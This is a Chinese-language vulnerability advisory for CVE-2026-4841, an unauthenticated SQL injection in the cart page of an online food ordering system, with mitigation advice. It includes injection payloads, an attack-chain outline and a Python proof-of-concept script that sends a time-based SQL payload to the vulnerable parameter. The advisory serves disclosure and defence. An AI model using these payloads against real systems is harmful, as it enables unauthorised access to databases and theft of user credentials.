CVE-2026-4841 CVSS 7.3 高危

CVE-2026-4841: 在线订餐系统SQL注入漏洞

披露日期: 2026-03-26

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-4841

漏洞类型

SQL注入

CVSS评分

7.3 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

code-projects Online Food Ordering System

漏洞概述

code-projects Online Food Ordering System 1.0版本的form/cart.php文件组件存在SQL注入漏洞。由于对用户输入的del参数缺乏有效的过滤，未经身份验证的远程攻击者可利用此漏洞执行恶意SQL语句，进而导致敏感信息泄露、数据篡改及服务中断。鉴于漏洞利用代码已公开，建议立即修复。

技术细节

该漏洞位于系统的购物车模块中，具体文件为form/cart.php。程序在处理删除商品请求时，直接将用户通过GET或POST方式提交的del参数拼接到SQL查询语句中，未进行任何安全过滤或类型转换。攻击者可以利用此缺陷构造包含SQL元字符（如单引号、注释符）的特殊Payload。例如，通过发送del=1' OR '1'='1，攻击者可改变查询逻辑。由于该漏洞无需用户交互且无需认证（PR:N），攻击者可远程利用此漏洞读取数据库中的敏感数据（如用户名、密码哈希），甚至在特定条件下写入Webshell获取服务器控制权。

攻击链分析

STEP 1

侦察

攻击者识别目标系统运行的是code-projects Online Food Ordering System 1.0版本。

STEP 2

武器化

攻击者构造恶意的SQL注入Payload，旨在通过del参数操纵数据库查询逻辑。

STEP 3

交付

攻击者向目标服务器发送特制的HTTP请求（GET/POST），请求路径为form/cart.php，并将恶意Payload赋值给del参数。

STEP 4

利用

服务器端脚本未过滤del参数，直接将其拼接到SQL语句中执行，导致数据库执行了攻击者注入的恶意命令。

STEP 5

影响

攻击者成功获取数据库敏感信息（如用户凭证），或对数据进行破坏，甚至可能导致服务器被完全控制。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

def check_sqli(target_url):
    """Check for SQL Injection in the del parameter"""
    # Target endpoint based on vulnerability description
    url = f"{target_url}/form/cart.php"
    
    # Testing payload to trigger SQL error or time delay
    payload = "1' AND SLEEP(5)-- -"
    
    params = {
        "del": payload
    }
    
    try:
        print(f"Sending request to {url} with payload: {payload}")
        response = requests.get(url, params=params, timeout=10)
        
        # Analyze response (example logic)
        if response.elapsed.total_seconds() >= 5:
            print("[+] Potential SQL Injection found (Time-based)")
        elif "error" in response.text.lower() or "syntax" in response.text.lower():
            print("[+] Potential SQL Injection found (Error-based)")
        else:
            print("[-] Vulnerability could not be confirmed via simple heuristic.")
            
    except requests.exceptions.RequestException as e:
        print(f"Error connecting to target: {e}")

if __name__ == "__main__":
    target = "http://localhost" # Replace with actual target
    check_sqli(target)

影响范围

code-projects Online Food Ordering System 1.0

防御指南

临时缓解措施

建议立即暂停受影响系统的对外服务，检查并修改form/cart.php文件中的代码逻辑，对所有外部输入参数进行强制类型转换或过滤。在未修复前，建议在网络边界设备上阻断对该页面的非法请求访问。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-4841
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-4841
3 Details https://www.cvedetails.com/cve/CVE-2026-4841/
4 VulDB https://vuldb.com/cve/CVE-2026-4841
5 Link https://code-projects.org/
6 Link https://gist.github.com/HxH404/ed090db972001ba535202fd4f5b6a0b5
7 Link https://vuldb.com/?ctiid.353147
8 Link https://vuldb.com/?id.353147
9 Link https://vuldb.com/?submit.776130

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表